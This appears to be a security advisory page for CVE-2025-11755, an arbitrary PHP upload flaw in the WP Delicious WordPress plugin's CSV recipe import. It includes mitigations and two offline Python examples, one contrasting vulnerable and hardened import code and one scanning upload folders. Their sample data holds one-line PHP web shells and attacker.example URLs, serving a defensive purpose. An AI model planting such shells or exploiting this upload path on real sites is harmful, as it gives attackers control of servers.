CVE-2025-11755: CWE-434 Unrestricted Upload of File with Dangerous Type in wpdelicious WP Delicious – Recipe Plugin for Food Bloggers (formerly Delicious Recipes)
The WP Delicious – Recipe Plugin for Food Bloggers (formerly Delicious Recipes) plugin for WordPress is vulnerable to arbitrary file uploads when importing recipes via CSV in all versions up to, and including, 1.9.0. This flaw allows an attacker with at least Contributor-level permissions to upload a malicious PHP file by providing a remote URL during a recipe import process, leading to Remote Code Execution (RCE).
AI Analysis
Technical Summary
The WP Delicious – Recipe Plugin for Food Bloggers (formerly Delicious Recipes) WordPress plugin contains a high-severity vulnerability tracked as CVE-2025-11755 and classified as CWE-434 (Unrestricted Upload of File with Dangerous Type). The flaw is in the recipe import feature, which users with at least Contributor-level permissions can use to import recipes from a CSV file. A CSV row can reference a remote URL; the plugin fetches that URL server-side and stores the downloaded content without restricting the file type, so an attacker who controls the URL can make the plugin write an arbitrary file, including a PHP script, onto the web server. Requesting that file then executes it, giving Remote Code Execution (RCE) under the web server's account.

All plugin versions up to and including 1.9.0 are affected. The CVSS v3.1 base score is 8.8 (High): network attack vector (AV:N), low attack complexity (AC:L), low privileges required (PR:L, a Contributor account), no user interaction (UI:N), and high impact on confidentiality, integrity, and availability, since successful exploitation gives control of the WordPress site and potentially the underlying host. No fixed release is linked in this record, and no in-the-wild exploitation had been reported as of the publication date (November 1, 2025).

The risk is amplified because Contributor is a low-trust role that many WordPress sites hand out to guest authors, and because the import feature exists for bulk content loading, so its use does not stand out, making it an attractive path for an attacker.
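To make the CWE-434 pattern concrete, the following added example (written for this page, not the plugin's own code) models the import step in Python: a vulnerable path that saves whatever a CSV-supplied URL returns under the remote filename, beside a hardened path that allow-lists image extensions, checks the downloaded bytes' magic numbers against the claimed extension, and rebuilds the filename before writing. The URLs, the FAKE_REMOTE lookup standing in for the HTTP fetch, and all function names are constructed for illustration.

```python
import os
import re
import tempfile
from urllib.parse import urlparse

# Constructed stand-in for the remote fetch (URL -> bytes the server would
# return). Real code would issue an HTTP GET; this keeps the example offline.
FAKE_REMOTE = {
    "https://attacker.example/shell.php": b"<?php system($_GET['c']); ?>",
    "https://attacker.example/photo.png": b"<?php system($_GET['c']); ?>",  # PHP behind an image extension
    "https://cdn.example/dish.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 16,      # JPEG magic bytes
    "https://cdn.example/dish.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,    # PNG magic bytes
}

ALLOWED_IMAGE_EXT = {"jpg", "png", "gif", "webp"}
MAGIC = {
    "jpg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
    "webp": b"RIFF",  # RIFF container; 'WEBP' must follow at offset 8
}


def fetch(url):
    return FAKE_REMOTE[url]


def vulnerable_import_image(url, upload_dir):
    """CWE-434 pattern: trust the remote filename and save whatever came back."""
    name = os.path.basename(urlparse(url).path)
    dest = os.path.join(upload_dir, name)
    with open(dest, "wb") as f:
        f.write(fetch(url))
    return dest


def sniff_image_type(data):
    """Return the image type implied by the leading bytes, or None."""
    for ext, magic in MAGIC.items():
        if data.startswith(magic):
            if ext == "webp" and data[8:12] != b"WEBP":
                continue
            return ext
    return None


def hardened_import_image(url, upload_dir):
    """Allow-list the extension, check the content matches it, rebuild the name."""
    name = os.path.basename(urlparse(url).path)
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    ext = "jpg" if ext == "jpeg" else ext
    if ext not in ALLOWED_IMAGE_EXT:
        raise ValueError(f"rejected {name!r}: extension {ext!r} is not an allowed image type")
    data = fetch(url)
    if sniff_image_type(data) != ext:
        raise ValueError(f"rejected {name!r}: content is not a {ext} image")
    # Rebuild the filename from a sanitised stem plus the verified extension so
    # double extensions ('x.php.png') and odd characters never reach disk.
    stem = re.sub(r"[^A-Za-z0-9_-]", "_", name.rsplit(".", 1)[0])[:64] or "image"
    dest = os.path.join(upload_dir, f"{stem}.{ext}")
    with open(dest, "wb") as f:
        f.write(data)
    return dest


def run_demo():
    """Run both paths over every constructed URL; return {url: (vulnerable, hardened)}."""
    results = {}
    with tempfile.TemporaryDirectory() as d:
        for url in FAKE_REMOTE:
            vuln = os.path.basename(vulnerable_import_image(url, d))
            try:
                hard = os.path.basename(hardened_import_image(url, d))
            except ValueError as e:
                hard = f"REJECTED ({e})"
            results[url] = (vuln, hard)
    return results


if __name__ == "__main__":
    for url, (vuln, hard) in run_demo().items():
        print(f"{url}\n  vulnerable saved: {vuln}\n  hardened: {hard}")
```

The point of the hardened path is that neither the extension nor the content check alone is enough: shell.php fails the allow-list, while photo.png passes the allow-list and is caught only because its bytes are not a PNG. Renaming from a sanitised stem is what defeats double-extension tricks that some PHP handler configurations would otherwise execute.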
Potential Impact
For European organizations, this vulnerability is a significant risk to any WordPress site that uses the WP Delicious plugin for recipe management. Successful exploitation gives full Remote Code Execution on the web server, letting an attacker run arbitrary commands, install backdoors, steal data, deface the site, or pivot into internal networks. The consequences include data breaches, service disruption, reputational damage, and compliance exposure under regulations such as GDPR. Food bloggers, culinary businesses, and media companies running this plugin are the most directly affected. Because a Contributor account is all that is needed, insider threats and compromised or phished contributor credentials are realistic routes to exploitation, and since no administrator interaction is required, the attack can be fully scripted once an attacker holds such an account. The impact also extends beyond the individual site: a compromised server can host malware or serve as a staging point for further attacks on European networks.
Mitigation Recommendations
Site operators should act before a fixed release is available. First, cut off the attack path: prevent Contributor-level accounts from reaching the recipe import until the plugin is fixed (for example by suspending or downgrading untrusted Contributor accounts, or by disabling the CSV import feature if the plugin's settings allow it), or remove the plugin entirely if it is not essential. Second, limit what a successful upload can achieve: configure the web server to refuse to execute PHP under wp-content/uploads (an Apache .htaccess or nginx location rule that denies .php and related extensions in that tree), which turns a dropped web shell into an inert file. Deploy WAF rules that block import or upload requests to this plugin's endpoints that carry PHP content. Monitor for unusual import activity and for new files under the uploads directory with executable extensions or containing PHP open tags. Restrict Contributor accounts to trusted people and require multi-factor authentication (MFA). Keep tested backups, follow vendor advisories (the CVE was assigned by Wordfence), and apply the fixed plugin version as soon as it is released. Conduct security audits of WordPress environments to identify and remediate similar risks. Note that the usual remedy for this CWE, validating the extension and content type of every imported file and rejecting or verifying remote URLs, is a fix the plugin author must make; site operators cannot apply it short of patching the plugin themselves.
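As an added example for the monitoring step above (not code from the plugin, the advisory, or this site), the Python script below hunts an uploads tree for files that a PHP handler could execute or that carry a PHP open tag despite an image extension, the two shapes an arbitrary upload through this flaw would take. The sample directory it builds in a temp folder, the file names, and the extension list are constructed for illustration; check the extension list against your own server's handler configuration.

```python
import os
import re
import tempfile

# Extensions that PHP handler configurations commonly execute. Constructed
# list for this example; compare it with your server's actual handler map.
PHP_EXTS = {".php", ".php3", ".php4", ".php5", ".php7", ".php8", ".phtml", ".phar", ".phps"}
# '<?php' or the short echo tag '<?=' anywhere in the first 64 KiB.
PHP_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)


def scan_uploads(root):
    """Return sorted [(relative_path, reason)] for files that are or contain PHP."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            rel = os.path.relpath(path, root)
            # Check every extension segment so 'shell.php.jpg' is caught as well.
            segs = [("." + s).lower() for s in fn.split(".")[1:]]
            if any(s in PHP_EXTS for s in segs):
                findings.append((rel, "php-executable extension"))
                continue
            with open(path, "rb") as f:
                head = f.read(65536)
            if PHP_TAG.search(head):
                findings.append((rel, "PHP open tag inside non-PHP file"))
    return sorted(findings)


def build_sample_tree(root):
    """Constructed uploads directory: two legitimate images, three suspicious files."""
    samples = {
        "2025/11/dish.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 32,
        "2025/11/dish.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 32,
        "2025/11/shell.php": b"<?php system($_GET['c']); ?>",
        "2025/11/photo.png": b"<?php eval(base64_decode($_POST['x'])); ?>",
        "2025/11/img.php.jpg": b"\xff\xd8\xff\xe0GIF",
    }
    for rel, data in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as f:
            f.write(data)


def run_demo():
    """Build the sample tree in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as d:
        build_sample_tree(d)
        return scan_uploads(d)


if __name__ == "__main__":
    for rel, reason in run_demo():
        print(f"{rel}: {reason}")
```

Run it against the real wp-content/uploads path instead of the sample tree by calling scan_uploads with that directory. A non-empty result is not proof of compromise (some themes ship legitimate PHP in uploads), but any hit created around the time of a recipe import by a Contributor account deserves immediate triage.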
Affected Countries
United Kingdom, Germany, France, Italy, Spain, Netherlands, Belgium, Sweden
Technical Details
- Data Version: 5.2
- Assigner Short Name: Wordfence
- Date Reserved: 2025-10-14T18:26:47.197Z
- CVSS Version: 3.1
- State: PUBLISHED
Threat ID: 6905ae02e1b1aafea8d7ec81
Added to database: 11/1/2025, 6:51:46 AM
Last enriched: 11/10/2025, 2:33:13 AM
Last updated: 12/14/2025, 1:49:33 PM